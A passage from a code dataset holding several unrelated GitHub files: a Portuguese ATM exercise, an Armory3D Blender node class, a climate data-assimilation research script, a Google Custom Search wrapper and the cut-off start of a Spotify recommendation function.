while saque != 0:\r\n if (saque % 50) != 0:\r\n print(f'Total de {saque // 50} cédulas de R$50')\r\n saqueRest = saque % 50\r\n if saqueRest % 20 != 0:\r\n print(f'Total de {saqueRest // 20} cédulas de R$20')\r\n saqueRest = saqueRest % 20\r\n if saqueRest % 10 != 0:\r\n print(f'Total de {saqueRest // 10} cédulas de R$10')\r\n saqueRest = saqueRest % 10\r\n print(f'Total de {saqueRest // 1} cédulas de R$1')\r\n break\r\n else:\r\n print(f'Total de {saqueRest // 10} cédulas de R$10')\r\n break\r\n else:\r\n print(f'Total de {saqueRest // 20} cédulas de R$20')\r\n break\r\n else:\r\n print(f'Total de {saque // 50} cédulas de R$50')\r\n break\r\n opcao = str(input('Deseja fazer outra operação? [S/N]: ')).upper().strip()\r\n while opcao not in 'SN':\r\n print('-=' * 15)\r\n opcao = str(input('Deseja fazer outra operação? [S/N]: ')).upper().strip()\r\n if opcao == 'N':\r\n break\r\nprint('-'*15)\r\nprint('AGRADECEMOS A PREFERÊNCIA!')\r\n","repo_name":"samurai-py/100-exercises-python-curso-em-video","sub_path":"Mundo 2/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70911720360","text":"from arm.logicnode.arm_nodes import *\n\nclass SetMaterialRgbParamNode(ArmLogicTreeNode):\n \"\"\"Set a color or vector value material parameter to the specified object. \n \n @seeNode Get Scene Root\n \n @input Object: Object whose material parameter should change. Use `Get Scene Root` node to set parameter globally.\n \n @input Per Object: \n - `Enabled`: Set material parameter specific to this object. Global parameter will be ignored.\n - `Disabled`: Set parameter globally, including this object.\n\n @input Material: Material whose parameter to be set.\n\n @input Node: Name of the parameter.\n\n @input Color: Color or vector input.\n \"\"\"\n bl_idname = 'LNSetMaterialRgbParamNode'\n bl_label = 'Set Material RGB Param'\n arm_section = 'params'\n arm_version = 2\n\n def arm_init(self, context):\n self.add_input('ArmNodeSocketAction', 'In')\n self.add_input('ArmNodeSocketObject', 'Object')\n self.add_input('ArmBoolSocket', 'Per Object')\n self.add_input('ArmDynamicSocket', 'Material')\n self.add_input('ArmStringSocket', 'Node')\n self.add_input('ArmColorSocket', 'Color')\n\n self.add_output('ArmNodeSocketAction', 'Out')\n\n def get_replacement_node(self, node_tree: bpy.types.NodeTree):\n if self.arm_version not in (0, 1):\n raise LookupError()\n \n return NodeReplacement(\n 'LNSetMaterialRgbParamNode', self.arm_version, 'LNSetMaterialRgbParamNode', 2,\n in_socket_mapping={0:0, 1:3, 2:4, 3:5}, out_socket_mapping={0:0}\n )\n","repo_name":"armory3d/armory","sub_path":"blender/arm/logicnode/material/LN_set_material_rgb_param.py","file_name":"LN_set_material_rgb_param.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":2916,"dataset":"github-code","pt":"18"} +{"seq_id":"38930831591","text":"#\n# Originator: Greg Hakim\n# December 2020\n#\n# perform DA experiments to assess assimilation impact on analyses and forecasts. \n#\n\n\"\"\"\n------------------------------\nstart: user defined parameters\n------------------------------\n\"\"\"\n\n# set the observations for all experiments \n#obnet = 'atmos'\n#obnet = 'ocean'\nobnet = 'all'\n\n# list of DA experiments ('uncoupled'=WCDA; 'coupled'=SCDA)\nDA_expts = ['coupled','atmos','ocean','uncoupled']\n\n# set the DA cycling time \nDA_dt = 1\n\n# error type ('standard'=truncation error; 'linreg_' options remove bits that covary with state)\n#error_type = 'standard'\nerror_type = 'linreg_multi'\n\n# save the O-F statistics and forecasts to a file, with the label defined below\n#save_stats = False\nsave_stats = True\nfile_label = error_type+'_paper'\n\n# use netcdf preprocessed files\nuse_nc = True\n#use_nc = False\n\n# set the (uncorrelated) observation error here in a dictionary (dimensional, std)\nofac = 0.\noberr_dict = {}\noberr_dict['tas'] = ofac*1.0 # K\noberr_dict['tos'] = ofac*1.0 # K\noberr_dict['rlut'] = ofac*1.0 # K\noberr_dict['ua_850hPa'] = ofac*1.0 # K\noberr_dict['va_850hPa'] = ofac*1.0 # K\n\n# choose obs either in EOF space or on a lat-lon grid\n#ob_grid = 'eof'\nob_grid = 'latlon'\n\n# specify the LIM file\nlim_fname = './LIMd_CFSR_tas_tos_rlut_ua_850hPa_va_850hPa_1979_2010_ntrunc400_nmodes30.npy'\n\n# specify the observation file, and the companion state file\nofile = './obs_global_equalarea_tas_rlut_ua_850hPa_va_850hPa_tos_CFSR_20040101_20101231.npy'\nsfile = './state_CFSR_20040101_20101231.npy'\n\n# specify files containing the definitions for H, R, and N\nofile_prep = './obs_operators_global_equalarea_tas_rlut_ua_850hPa_va_850hPa_tos_CFSR_19790101_20031231.npy'\n\n# define atmos and ocean variables \nvars_atmos = ['tas','rlut','ua_850hPa','va_850hPa']\nvars_ocean = ['tos']\n\n\"\"\"\n------------------------------\nend: user defined parameters\n------------------------------\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport sys,os\nimport numpy as np\nimport xarray as xr\nimport datetime\nimport yaml\nimport LIM_utils_new as LIM_utils\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport cartopy.crs as ccrs\nimport cartopy.feature\nfrom cartopy.util import add_cyclic_point\n\n# seed an instance of the random number generator (this is an object than can be passed to functions)\nrng = np.random.default_rng(2021)\n\n# read the observations\nobs_allvars = np.load(ofile,allow_pickle='TRUE').item()\n\n# read the truncated state that corresponds to the observations\nP_state = np.load(sfile,allow_pickle='TRUE').item() # dimensional!\n\n# assign variables to observation list based on obnet choice\nobvars_atmos = ['tas','rlut','ua_850hPa','va_850hPa']\nobvars_ocean = ['tos']\nobvars_all = obvars_atmos + obvars_ocean\n\n# timestamp this dataset\nwhen_created = datetime.datetime.now()\n\n# load the LIM (from LIM_train.py)\nprint('loading LIM file ',lim_fname)\nLIMd = np.load(lim_fname,allow_pickle='TRUE').item()\nscale_fac = LIMd['scale_fac']\nlimvars = LIMd['limvars']\nnEOF = LIMd['nEOF']\nnmodes = LIMd['nmodes']\nivars = LIMd['ivars']\nnvars = len(limvars)\n\n# set up the resolvant\nGt = np.matmul(np.matmul(LIMd['vec'],np.diag(np.exp(LIMd['lam']*DA_dt))),LIMd['veci'])\n\n# make variable-index look-up dictionary for atmos and ocean LIMs, like ivars does for all\nivars_atmos = {}\nivars_ocean = {}\nasi = 0\nosi = 0\nk = -1\nEOF_files = {}\nfor var in limvars:\n k +=1\n nnmodes = nmodes[k]\n EOF_files[var] = './CFSR_'+var+'_1979_2010_ntrunc400_mavg5.npy'\n\n if var in vars_ocean: # can generalize if needed\n oei = osi + nnmodes\n ivars_ocean[var] = list(range(osi,osi+nnmodes,1))\n osi = oei\n elif var in vars_atmos:\n aei = asi + nnmodes\n ivars_atmos[var] = list(range(asi,asi+nnmodes,1))\n asi = aei\n else:\n print('ERROR! this variable is not assigned to atmos or ocean')\n\n# set the observation operators and observation error covariance\nif ob_grid == 'eof':\n print('using identity obs in EOF space...')\n Htmp = np.zeros([ndof,ndof])\n Rdiag = np.ones(ndof)\n si = 0\n k = -1\n for var in limvars:\n k +=1\n nnmodes = nmodes[k]\n\n ei = si + nnmodes\n print('working on...',var,si,si+nnmodes)\n if var != 'tos': \n if obnet != 'ocean':\n Htmp[si:si+nnmodes,si:si+nnmodes] = np.eye(nnmodes)\n else:\n if obnet != 'atmos':\n Htmp[si:si+nnmodes,si:si+nnmodes] = np.eye(nnmodes)\n\n si = ei\n \n # fill in the diagonal observation error variance\n oberr = (oberr_dict[var])**2\n Rdiag[si:si+nnmodes,si:si+nnmodes] = oberr*Rdiag[si:si+nnmodes,si:si+nnmodes]\n \n # remove the empty rows (null obs) (https://stackoverflow.com/questions/11188364/remove-zero-lines-2-d-numpy-array)\n H = Htmp[~np.all(Htmp == 0,axis=0)]\n\n # diagonal ob-error covariance matrix\n nobs = H.shape[0]\n R = np.diag(Rdiag)\n\nelif ob_grid == 'latlon':\n\n # observing network is specified on a lat-lon grid\n print('using identity obs in lat-lon space from '+ofile)\n obs_allvars = np.load(ofile,allow_pickle='TRUE').item()\n \n print('using calibrated H, R, and N from '+ofile_prep)\n ob_prep = np.load(ofile_prep,allow_pickle='TRUE').item()\n \n # assign the observation variables\n print(\"observing network = obvars_%s\" % obnet)\n exec(\"obvars = obvars_%s\" % obnet)\n\n # load index info\n obinds = ob_prep['obinds']\n obinds_atmos = ob_prep['obinds_atmos']\n obinds_ocean = ob_prep['obinds_ocean']\n iatmos_obs = ob_prep['iatmos_obs']\n iocean_obs = ob_prep['iocean_obs']\n iatmos = ob_prep['iatmos']\n iocean = ob_prep['iocean']\n \n si = 0\n k = -1\n first_var = True\n Rdiag = []\n for var in limvars:\n k +=1\n nnmodes = nmodes[k]\n\n ei = si + nnmodes\n\n # note: obs_allvars has already been scaled\n # yh is the observation resolved in the truncated lat-lon space\n if var in obvars:\n nobs_var = obinds[var][1]-obinds[var][0]+1\n print('working on...',var,si,si+nnmodes,nobs_var)\n if first_var:\n allobs = obs_allvars[var]['obs_full']\n yh = obs_allvars[var]['obs_full'] - obs_allvars[var]['obs_trunc_error']\n first_var = False\n else:\n allobs = np.concatenate((allobs,obs_allvars[var]['obs_full']),axis=0)\n yh = np.concatenate((yh,obs_allvars[var]['obs_full']- obs_allvars[var]['obs_trunc_error']),axis=0)\n\n # fill in the (optional) diagonal observation error variance (\"instrument\" error)\n oberr = (oberr_dict[var])**2\n Rdiag = Rdiag + (oberr*np.ones(nobs_var)).tolist() \n print('Rdiag:',nobs_var,len(Rdiag),allobs.shape,yh.shape)\n\n # move on to next limvar\n si = ei\n\n nobs = allobs.shape[0]\n print('nobs = ',nobs)\n n_obtimes = allobs.shape[1]\n print('number of times with observations=',n_obtimes)\n\nelse:\n raise Exception('no valid observing grid')\n\nprint(np.trace(ob_prep['R']))\nprint(np.trace(ob_prep['Rn']))\nprint(np.trace(ob_prep['Rn_one']))\nprint(np.trace(ob_prep['Rn'])/np.trace(ob_prep['R']))\n\n# initialize calibrated LIM noise and training covariance\nNoise = ob_prep['Noise']\nC_0 = ob_prep['C_0']\n\n# select H & R here; do so consistently as they are paired\nif error_type == 'standard':\n H = ob_prep['H']\n R = ob_prep['R']\nelif error_type == 'linreg_multi':\n H = ob_prep['newH']\n R = ob_prep['Rn']\nelse:\n raise('this type of ob error not supported!')\n \n#\n# atmosphere and ocean specific pieces of N, H, R, and G\n#\nGatmos = Gt[iatmos,:][:,iatmos]\nGocean = Gt[iocean,:][:,iocean]\nprint('G:',Gt.shape,Gatmos.shape,Gocean.shape)\nNatmos = Noise[iatmos,:][:,iatmos]\nNocean = Noise[iocean,:][:,iocean]\nprint('Noise:',Noise.shape,Natmos.shape,Nocean.shape)\n# recall that H and R have different indices (observations, not state)\nHatmos = H[iatmos_obs,:][:,iatmos]\nHocean = H[iocean_obs,:][:,iocean]\nprint('H:',H.shape,Hatmos.shape,Hocean.shape)\nRatmos = R[iatmos_obs,:][:,iatmos_obs]\nRocean = R[iocean_obs,:][:,iocean_obs]\nprint('R:',R.shape,Ratmos.shape,Rocean.shape)\n# filter observations & Rdiag\nallobs_all = np.copy(allobs)\nallobs_atmos = np.copy(allobs[iatmos_obs,:])\nallobs_ocean = np.copy(allobs[iocean_obs,:])\nRdiag_all = np.array(Rdiag)\nRdiag_atmos = np.array(Rdiag)[iatmos_obs]\nRdiag_ocean = np.array(Rdiag)[iocean_obs]\n# save the originals since I recycle the names below\nRall = np.copy(R)\nHall = np.copy(H)\nGall = np.copy(Gt)\nNall = np.copy(Noise)\n\n\"\"\"\nloop over DA experiments.\n\nthe first step involves a forecast from the initialized state. the k=0 index \ntherefore applies to the *update* at the time of the first forecast, which is \nalso the time of the first observations. the last time is the time of the last \nobservations.\n\"\"\"\n\n# set up the resolvant\nGt = np.matmul(np.matmul(LIMd['vec'],np.diag(np.exp(LIMd['lam']*DA_dt))),LIMd['veci'])\nGatmos = Gt[iatmos,:][:,iatmos]\nGocean = Gt[iocean,:][:,iocean]\n\n# set the number of DA cycles (in units of DA_dt)\nnDA = n_obtimes\n#nDA = 100\n\nDA_results = {}\nfor DA_expt in DA_expts:\n print('DA case: ',DA_expt)\n\n # initialize according to the DA experiment\n if DA_expt == 'atmos':\n # atmos LIM and atmos obs only\n B = C_0[iatmos,:][:,iatmos]\n H = Hatmos\n R = np.copy(Ratmos) + np.diag(Rdiag_atmos)\n G = Gatmos\n Noise = Natmos\n allobs = allobs_atmos\n Rdiag = Rdiag_atmos\n elif DA_expt == 'ocean':\n # ocean LIM and ocean obs only\n B = C_0[iocean,:][:,iocean]\n #B = Bconv\n H = Hocean\n R = np.copy(Rocean) + np.diag(Rdiag_ocean)\n G = Gocean\n Noise = Nocean\n allobs = allobs_ocean\n Rdiag = Rdiag_ocean\n elif DA_expt == 'uncoupled':\n # coupled LIM and separate atmos and ocean DA (WCDA)\n B = C_0\n H = Hall\n G = Gall\n Noise = Nall\n allobs = allobs_all\n Rdiag = Rdiag_all\n R = np.copy(Rall) + np.diag(Rdiag_all)\n elif DA_expt == 'coupled':\n # coupled LIM and coupled DA (SCDA)\n B = C_0\n H = Hall\n G = Gall\n Noise = Nall\n allobs = allobs_all\n Rdiag = Rdiag_all\n R = np.copy(Rall) + np.diag(Rdiag_all)\n else:\n print('not a valid experiment')\n \n # number of observations\n nobs = H.shape[0]\n # number of state variables\n ndof = H.shape[1]\n \n print('done with setup',nobs,Rdiag.shape,nDA)\n\n # observations for all DA times\n tims = tuple(np.arange(0,nDA*DA_dt,DA_dt))\n Y = np.take(allobs,tims,axis=1)\n print('Y:',Y.shape)\n \n A = np.copy(B)\n xbm = np.zeros(ndof)\n xam = np.zeros(ndof)\n xbm_save = np.zeros([ndof,nDA])\n xam_save = np.zeros([ndof,nDA])\n \n dob = np.zeros([nobs,nDA])\n doa = np.zeros([nobs,nDA])\n dab = np.zeros([nobs,nDA])\n HBHT = np.zeros(nobs)\n HBHTpR = np.zeros(nobs)\n HAHT = np.zeros(nobs)\n \n for k in range(nDA):\n if np.mod(k,100)==0: print('DA cycle ',k,'= day',k*DA_dt)\n y = Y[:,k*DA_dt]\n # forecast\n xbm = np.matmul(G,xam) \n B = np.real(np.matmul(np.matmul(G,A),G.T)) + Noise\n # analysis\n if DA_expt == 'uncoupled':\n # unpack the atmos and ocean covariance matrices\n Batmos = B[iatmos,:][:,iatmos]\n Bocean = B[iocean,:][:,iocean]\n xam_atmos,Aatmos = LIM_utils.kalman_update(xbm[iatmos],Batmos,Hatmos,y[iatmos_obs],R[iatmos_obs,:][:,iatmos_obs])\n xam_ocean,Aocean = LIM_utils.kalman_update(xbm[iocean],Bocean,Hocean,y[iocean_obs],R[iocean_obs,:][:,iocean_obs])\n # repack the analysis state vector\n xam = np.zeros(ndof)\n xam[iatmos] = xam_atmos\n xam[iocean] = xam_ocean\n # repack the atmos and ocean matrices into the full state matrix\n A = np.zeros([ndof,ndof])\n kk = -1\n for ki in iatmos:\n kk +=1\n A[iatmos,ki] = Aatmos[:,kk]\n kk = -1\n for ki in iocean:\n kk +=1\n A[iocean,ki] = Aocean[:,kk] \n else:\n xam,A = LIM_utils.kalman_update(xbm,B,H,y,R)\n \n # save the state\n xbm_save[:,k] = xbm\n xam_save[:,k] = xam\n \n # desrosiers verification\n if DA_expt == 'uncoupled':\n dob[iatmos_obs,k] = y[iatmos_obs] - np.matmul(Hatmos,xbm[iatmos])\n dob[iocean_obs,k] = y[iocean_obs] - np.matmul(Hocean,xbm[iocean])\n doa[iatmos_obs,k] = y[iatmos_obs] - np.matmul(Hatmos,xam[iatmos])\n doa[iocean_obs,k] = y[iocean_obs] - np.matmul(Hocean,xam[iocean])\n dab[iatmos_obs,k] = np.matmul(Hatmos,xam[iatmos]) - np.matmul(Hatmos,xbm[iatmos])\n dab[iocean_obs,k] = np.matmul(Hocean,xam[iocean]) - np.matmul(Hocean,xbm[iocean])\n else:\n dob[:,k] = y - np.matmul(H,xbm)\n doa[:,k] = y - np.matmul(H,xam)\n dab[:,k] = np.matmul(H,xam) - np.matmul(H,xbm)\n\n # only check converged versions of A and B\n if DA_expt == 'uncoupled':\n # only save the diagonal elements of these\n HBHT[iatmos_obs] = np.diag(np.matmul(Hatmos,np.matmul(B[iatmos,:][:,iatmos],Hatmos.T)))\n HAHT[iatmos_obs] = np.diag(np.matmul(Hatmos,np.matmul(A[iatmos,:][:,iatmos],Hatmos.T)))\n HBHTpR[iatmos_obs] = HBHT[iatmos_obs] + np.diag(R[iatmos_obs,:][:,iatmos_obs])\n #\n HBHT[iocean_obs] = np.diag(np.matmul(Hocean,np.matmul(B[iocean,:][:,iocean],Hocean.T)))\n HAHT[iocean_obs] = np.diag(np.matmul(Hocean,np.matmul(A[iocean,:][:,iocean],Hocean.T)))\n HBHTpR[iocean_obs] = HBHT[iocean_obs] + np.diag(R[iocean_obs,:][:,iocean_obs])\n Rsave = np.zeros(nobs)\n Rsave[iatmos_obs] = np.diag(R[iatmos_obs,:][:,iatmos_obs])\n Rsave[iocean_obs] = np.diag(R[iocean_obs,:][:,iocean_obs])\n else:\n HBHT = np.diag(np.matmul(H,np.matmul(B,H.T)))\n HAHT = np.diag(np.matmul(H,np.matmul(A,H.T)))\n HBHTpR = HBHT + np.diag(R)\n Rsave = np.diag(R)\n \n # save the results (all times, so time series can be plotted)\n DA_results[DA_expt] = {'dob':dob,'doa':doa,'dab':dab}\n DA_results[DA_expt]['HBHT'] = HBHT\n DA_results[DA_expt]['HBHTpR'] = HBHTpR\n DA_results[DA_expt]['HAHT'] = HAHT\n DA_results[DA_expt]['Rsave'] = Rsave\n DA_results[DA_expt]['xbm'] = xbm_save\n DA_results[DA_expt]['A'] = A\n DA_results[DA_expt]['B'] = B\n DA_results[DA_expt]['xam'] = xam_save\n\n# verify all experiments\nDA_checks_all = {}\n\nfor DA_expt in DA_expts:\n DA_checks = {}\n dob = DA_results[DA_expt]['dob']\n doa = DA_results[DA_expt]['doa']\n dab = DA_results[DA_expt]['dab']\n HAHT = DA_results[DA_expt]['HAHT']\n HBHT = DA_results[DA_expt]['HBHT']\n HBHTpR = DA_results[DA_expt]['HBHTpR']\n Rsave = DA_results[DA_expt]['Rsave']\n\n # MSE\n dob_mse = np.mean(dob**2,axis=1)\n DA_checks['dob_mse'] = dob_mse\n dob_bias = np.mean(dob,1,keepdims=True)\n DA_checks['dob_bias'] = dob_bias\n\n # desrosiers checks\n dob = dob - np.mean(dob,1,keepdims=True)\n doa = doa - np.mean(doa,1,keepdims=True)\n dab = dab - np.mean(dab,1,keepdims=True)\n HBHT_check = np.matmul(dab,dob.T)/(nDA-1)\n HBHTpR_check = np.matmul(dob,dob.T)/(nDA-1)\n Rsave_check = np.matmul(doa,dob.T)/(nDA-1)\n HAHT_check = np.matmul(dab,doa.T)/(nDA-1)\n\n # print trace of checks\n print('HBHT:',np.sum(HBHT),np.trace(HBHT_check))\n print('HBHT + R:',np.sum(HBHTpR),np.trace(HBHTpR_check))\n print('R:',np.sum(R),np.trace(Rsave_check))\n print('HAHT:',np.sum(HAHT),np.trace(HAHT_check))\n print(np.min(np.diag(HBHT_check)))\n print(np.min(np.diag(HBHTpR_check)))\n print(np.min(np.diag(HAHT_check)))\n DA_checks['HBHT_check'] =HBHT_check\n DA_checks['HBHTpR_check'] = HBHTpR_check\n DA_checks['Rsave_check'] = Rsave_check\n DA_checks['HAHT_check'] = HAHT_check\n \n DA_checks_all[DA_expt] = DA_checks\n\n# add data and save to a file\nDA_checks_all['obinds'] = obinds\nDA_checks_all['obinds_atmos'] = obinds_atmos\nDA_checks_all['obinds_ocean'] = obinds_ocean\nDA_checks_all['iatmos_obs'] = iatmos_obs\nDA_checks_all['iocean_obs'] = iocean_obs\nDA_checks_all['iocean'] = iocean\nDA_checks_all['iatmos'] = iatmos\nDA_checks_all['obvars_all'] = obvars_all\nDA_checks_all['obvars_atmos'] = obvars_atmos\nDA_checks_all['obvars_ocean'] = obvars_ocean\nDA_checks_all['DA_results'] = DA_results\nDA_checks_all['EOF_files'] = EOF_files\nDA_checks_all['nmodes'] = nmodes\nDA_checks_all['sfile'] = sfile\nDA_checks_all['ivars'] = ivars\nDA_checks_all['scale_fac'] = scale_fac\nDA_checks_all['limvars'] = limvars\nDA_checks_all['nDA'] = nDA\nDA_checks_all['obnet'] = obnet\nDA_checks_all['sfile'] = sfile\nDA_checks_all['ofile'] = ofile\nDA_checks_all['ofile_prep'] = ofile_prep\nDA_checks_all['ob_grid'] = ob_grid\n\n\"\"\"\nbegin forecasting experiments \n\"\"\"\n\n# make the full state matrix---moved to here to use Ptruth in forecasting\nprint(P_state.keys())\nfirst = True\nfor var in limvars:\n if first:\n Ptruth = P_state[var]\n first = False\n else:\n Ptruth = np.concatenate((Ptruth,P_state[var]),axis=0)\n \nprint(Ptruth.shape)\n\n# generate ocean mask\nvar = 'tos'\nvar_tru = P_state[var]\nvar_var = np.matmul(var_tru,var_tru.T)/(var_tru.shape[1]-1)\ninfile = EOF_files[var]\nif use_nc:\n npfile = LIM_utils.npydict_from_netcdf(infile[:-3]+'nc')\nelse:\n npfile = np.load(infile,allow_pickle='TRUE').item()\n\nlat_2d = npfile['lat_2d']\nlon_2d = npfile['lon_2d']\nnlat = lat_2d.shape[0]\nnlon = lat_2d.shape[1]\nvarinfile = npfile['varinfile']\nu_field = npfile['u_field'][varinfile].values[:,:nnmodes]\nvar_latlon = np.einsum('ij,ji->i',np.matmul(u_field,var_var),u_field.T)\nvar_latlon[var_latlon<1e-12]=np.nan\n# make masks that can be used with nan functions:\n# ocean_mask: 1 over ocean, nan over land\nocean_mask = np.copy(var_latlon)\nocean_mask[ocean_mask>1e-12]=1.0\nocean_mask[ocean_mask<1e-12]=np.nan\n\nnregions = 16 # number of geographical areas to average for regional means (hardwired)\nLIM_forecasts = {}\nlags = [0,1,2,3,4,5,6,7,8,9,10,15,20,25,30,40,50]\nprint('lags:',lags)\nLIM_forecasts['lags'] = lags\n\nfor DA_expt in DA_expts:\n # set initial conditions\n if DA_expt == 'atmos':\n print('----atmos control----')\n x = DA_checks_all['DA_results']['atmos']['xam']\n elif DA_expt == 'ocean':\n print('----ocean control----')\n x = DA_checks_all['DA_results']['ocean']['xam']\n elif DA_expt == 'cold':\n print('----cold start coupled----')\n x = Ptruth\n else:\n print('----'+DA_expt+'----')\n x = DA_checks_all['DA_results'][DA_expt]['xam']\n\n # forecasts for all lags---work needed here\n ndof = x.shape[0]\n ntims = x.shape[1]\n nlags = len(lags)\n x_forecast = np.zeros([nlags,ndof,ntims])\n ilag = -1\n for lag in lags:\n ilag +=1\n Gt = np.matmul(np.matmul(LIMd['vec'],np.diag(np.exp(LIMd['lam']*lag))),LIMd['veci'])\n if DA_expt == 'atmos':\n Gt = Gt[iatmos,:][:,iatmos]\n elif DA_expt == 'ocean':\n print('using G ocean for lag ',lag,ilag)\n Gt = Gt[iocean,:][:,iocean]\n # forecast for one lag; save in temp dictionary\n LIMfd_tmp = LIM_utils.LIM_forecast(LIMd,x,[lag],Gin=Gt)\n x_forecast[ilag,:,:] = LIMfd_tmp['x_forecast'][0,:,:]\n\n # fill the dictionary with the forecasts for all lags\n LIMfd = LIMfd_tmp\n LIMfd['x_forecast'] = x_forecast\n \n var_gm_save = {}\n mse_gm_save = {}\n mse_rm_save = {}\n mse_gm_alltims_save = {}\n all_save_var = {}\n \n # verify each variable\n var_info = {}\n for var in limvars:\n if DA_expt == 'atmos' and var in vars_ocean:\n continue\n elif DA_expt == 'ocean' and var in vars_atmos:\n continue\n elif DA_expt == 'atmos':\n istate = ivars_atmos[var]\n elif DA_expt == 'ocean':\n istate = ivars_ocean[var]\n elif DA_expt == 'cold':\n istate = ivars[var]\n else:\n istate = ivars[var]\n\n print('verifying '+var)\n nnmodes = len(ivars[var])\n infile = EOF_files[var]\n if use_nc:\n npfile = LIM_utils.npydict_from_netcdf(infile[:-3]+'nc')\n else:\n npfile = np.load(infile,allow_pickle='TRUE').item()\n\n lat_2d = npfile['lat_2d']\n lon_2d = npfile['lon_2d']\n nlat = lat_2d.shape[0]\n nlon = lat_2d.shape[1]\n var_info[var] = {'lat_2d':lat_2d,'lon_2d':lon_2d,'nlat':nlat,'nlon':nlon}\n varinfile = npfile['varinfile']\n u_field = npfile['u_field'][varinfile].values[:,:nnmodes]\n # apply ocean mask to tos\n if var == 'tos':\n u_field = ocean_mask[:,np.newaxis]*u_field\n \n # cold start forecasts don't need scaling, but everything else does\n if DA_expt == 'cold':\n scaling = 1.0\n else:\n scaling = scale_fac[var]\n\n var_gm = np.zeros(len(lags))\n mse_gm = np.zeros(len(lags))\n mse_rm = np.zeros([nregions,len(lags)])\n all_save = np.zeros([len(lags),u_field.shape[0]])\n mse_gm_alltims = np.zeros([len(lags),nDA])\n mse_gm_alltims[:] = np.nan\n ilag = -1\n for lag in lags:\n ilag +=1\n print('lag=',lag)\n ftims = tuple(np.arange(lag,nDA*DA_dt,DA_dt))\n verif = np.take(P_state[var],ftims,axis=1)\n nverif = verif.shape[1]\n if lag == 0:\n ferror = scaling*x[istate,:] - verif\n else:\n ferror = scaling*LIMfd['x_forecast'][ilag,istate,:-lag] - verif\n\n print('ferror shape:',ferror.shape)\n \n # MSE over time, then averaged in space (small storage)\n mse_c = np.matmul(ferror,ferror.T)/(ferror.shape[1]-1)\n mse_latlon = np.einsum('ij,ji->i',np.matmul(u_field,mse_c),u_field.T)\n err_latlon = np.reshape(mse_latlon,[nlat,nlon])\n mse_gm_tmp,_,_ = LIM_utils.global_hemispheric_means(err_latlon,lat_2d[:,0])\n mse_gm[ilag] = mse_gm_tmp\n all_save[ilag,:] = mse_latlon\n rnames,rmean = LIM_utils.PAGES2K_regional_means(err_latlon,lat_2d,lon_2d)\n mse_rm[:,ilag] = rmean[:,0]\n # MSE global mean as a function of time (large storage)\n msevar = np.matmul(u_field,ferror)**2\n tmp = np.reshape(msevar,[nlat,nlon,msevar.shape[1]])\n tmp2 = np.moveaxis(tmp,2,0)\n tmp,_,_ = LIM_utils.global_hemispheric_means(tmp2,lat_2d[:,0])\n mse_gm_alltims[ilag,lag:] = tmp\n\n # variance\n ferror = ferror - np.mean(ferror,axis=1,keepdims=True)\n evar_c = np.matmul(ferror,ferror.T)/(ferror.shape[1]-1)\n var_latlon = np.einsum('ij,ji->i',np.matmul(u_field,evar_c),u_field.T)\n err_latlon = np.reshape(var_latlon,[nlat,nlon])\n var_gm_tmp,_,_ = LIM_utils.global_hemispheric_means(err_latlon,lat_2d[:,0])\n var_gm[ilag] = var_gm_tmp\n\n # archive results in dictionaries\n var_gm_save[var] = var_gm\n mse_gm_save[var] = mse_gm\n mse_rm_save[var] = mse_rm\n all_save_var[var] = all_save\n mse_gm_alltims_save[var] = mse_gm_alltims\n\n # package up for each variable\n LIM_forecasts[DA_expt] = {'mse_rm_save':mse_rm_save,'mse_gm_alltims_save':mse_gm_alltims_save,'var_gm_save':var_gm_save,'mse_gm_save':mse_gm_save,'all_save_var':all_save_var,'var_info':var_info}\n\n# MSE by regional average; add names for the regions\nLIM_forecasts['region_names'] = rnames\n\n\"\"\"\nend forecasting experiments \n\"\"\"\n\n# add forecasting results to the existing dictionary and save the whole experiment\nDA_checks_all['LIM_forecasts']= LIM_forecasts\nif save_stats:\n ofname = 'DA_results_'+file_label+'.npy'\n print('saving DA results here: ',ofname)\n np.save(ofname,DA_checks_all)\n\n\n","repo_name":"modons/GRL2022_LIM_DA","sub_path":"LIM_DA_cycling.py","file_name":"LIM_DA_cycling.py","file_ext":"py","file_size_in_byte":23951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14101916464","text":"from app import config\nimport uuid\nimport requests\nfrom app.routes import sqldb\n\nclass CustomSearch():\n def __init__(self):\n self.api_key = config['GOOGLE_CUSTOM_SEARCH_API_KEY']\n self.engine_id = config['GOOGLE_PROGRAMMABLE_SEACH_ENGINE_ID']\n\n def get_searches(self, query):\n api_url = \"https://www.googleapis.com/customsearch/v1?key={0}&cx={1}\".format(self.api_key, self.engine_id)\n search_params = {\n 'q': query,\n 'dateRestrict': \"\",\n 'exactTerms': \"\",\n 'excludeTerms': \"\",\n 'num': 10,\n 'orTerms': \"\",\n 'relatedSite': \"\",\n 'siteSearch': \"\"\n }\n for key in search_params:\n if search_params[key] != '':\n api_url += \"&{0}={1}\".format(key, search_params[key])\n\n r = requests.get(api_url)\n search_items = []\n\n for item in r.json()['items']:\n title = str(item['title']).replace('\\'', '')\n description = str(item['snippet']).replace('\\n', '').replace('\\xa0', '').replace('\\'', '')\n link = str(item['link'])\n domain = str(item['displayLink'])\n id = str(uuid.uuid3(uuid.NAMESPACE_URL, link))\n search_item = {\n 'id': id,\n 'title': title,\n 'description': description,\n 'link': link,\n 'domain': domain\n }\n search_items.append(search_item)\n sqldb.create_source(search_item)\n\n # print(search_items)\n return search_items\n \n","repo_name":"RoyalWeden/codefind","sub_path":"app/customsearch.py","file_name":"customsearch.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27556922485","text":"import boto3\nimport json\nimport os\nimport random\nimport base64\nimport requests\nimport numpy as np\n\ndb_client = boto3.client('dynamodb')\n\nTOTAL_TRACK = int(os.environ['total_track']) # 22480\nclient_creds = os.environ['client_creds'] # from Spotify Application\n\ndef get_user_like(userId):\n response = db_client.get_item(\n Key={\n 'userId': {\n 'S': userId,\n },\n\n },\n TableName='user-like',\n AttributesToGet=['likelist']\n )\n if \"Item\" not in response:\n return \"\"\n like_tids = response[\"Item\"][\"likelist\"][\"S\"]\n return like_tids\n\ndef get_token():\n client_creds_64 = base64.b64encode(client_creds.encode())\n token_data = 